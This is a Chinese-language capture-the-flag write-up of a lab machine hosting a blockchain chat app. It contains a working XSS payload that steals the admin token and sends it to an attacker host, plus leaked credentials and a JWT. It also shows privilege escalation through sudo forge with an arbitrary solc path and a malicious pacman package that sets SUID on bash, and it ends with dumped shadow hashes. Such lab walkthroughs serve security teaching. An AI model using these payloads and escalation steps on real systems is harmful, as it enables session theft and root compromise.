基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nmap -sC -sV -Pn 10.10.11.43
Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-20 13:17 CST
Nmap scan report for 10.10.11.43
Host is up (0.083s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.7 (protocol 2.0)
| ssh-hostkey:
|   256 d6:31:91:f6:8b:95:11:2a:73:7f:ed:ae:a5:c1:45:73 (ECDSA)
|_  256 f2:ad:6e:f1:e3:89:38:98:75:31:49:7a:93:60:07:92 (ED25519)
80/tcp open  http    Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
|_http-title:          Home  - DBLC

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.42 seconds

80

使用blockchain技术的聊天应用:

Chat

随意注册登录,可以看到bot自动发送的message,以及report user功能和sol代码:

report user

现在只有输入交互,存在bot,常规测试XSS,发现report user可能存在XSS:

xss

cookie是http only,但可以注意到info接口可以得到自己的token,所以如果xss让bot先请求info获取token响应,然后就可以把响应结果再带出来:

1
{"role":"admin","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczMjA4MDY2MSwianRpIjoiMzk0YzAzYzYtZjAzZC00MWNkLThmNzgtZTE2MjE1Zjc0ZWViIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluIiwibmJmIjoxNzMyMDgwNjYxLCJleHAiOjE3MzI2ODU0NjF9.hck4tzbasiabtuy_3ey_2zpKJwRj1g8VfRZw63_KOEc","username":"admin"}

xss.js

1
2
3
4
5
fetch('/api/info').then(response => response.text()).then(text => {
    fetch('http://10.10.14.10:7777/log?' + btoa(text), {
        mode: 'no-cors'
    });
});

Admin

替换cookie后,可以看到多出一个Admin:

可以看到使用json rpc和ethereum交互:

eth_getBlockByNumber

根据文档,发现eth_getBlockByNumber,从区块链开头开始看block:

第一个block的input,解码得到keira相关信息,疑似密码:

1
2
keira
SomedayBitCoinWillCollapse

keira & user flag

得到的就是账号密码,ssh登录:

forge

keira可以以paul用户身份运行forge,测试运行是用来调试智能合约的:

查看文档可以发现build时可以指定solc路径,导致我们可以以paul身份运行任意程序:

1
2
3
sudo -u paul /home/paul/.foundry/bin/forge build -h
--use <SOLC_VERSION>
          Specify the solc version, or a path to a local solc, to build with

paul

所以就是创建一个项目,build的时候指定要运行的程序:

1
2
3
sudo -u paul /home/paul/.foundry/bin/forge init /tmp/miao/test --no-git --offline

sudo -u paul /home/paul/.foundry/bin/forge build --use /tmp/miao/shell.sh

提权 & root flag

paul可以sudo运行pacman,pacman是包管理工具,很常规的,安装恶意包:

1
2
3
4
5
echo -e "pkgname=miao\npkgver=1.0\npkgrel=1\narch=('any')\ninstall=miao.install" > PKGBUILD
echo "post_install() { chmod +s /bin/bash; }" > miao.install
makepkg -s
sudo pacman -U *.zst --noconfirm
bash -p

shadow

1
2
3
root:$y$j9T$aS1WjBeHOMsj5JDGpOSTR0$eEn9e2kIqFfcRCf79xQw7iLDJbt/ioE793tqS3GnjsC:19878::::::
keira:$y$j9T$XXkQ9ogGKlThyrI.mItx80$eMiwlviC0FB/bu5tWtoc.DpedzwUnOwETzmlPf6ZuC8:19878:0:99999:7:::
paul:$y$j9T$milm8la5tGGIhUazNYV3k.$lsAle1Ny3lNaIzStej/8qsKj/1wSgaoi15f/u5Ky/h9:19878:0:99999:7:::

参考资料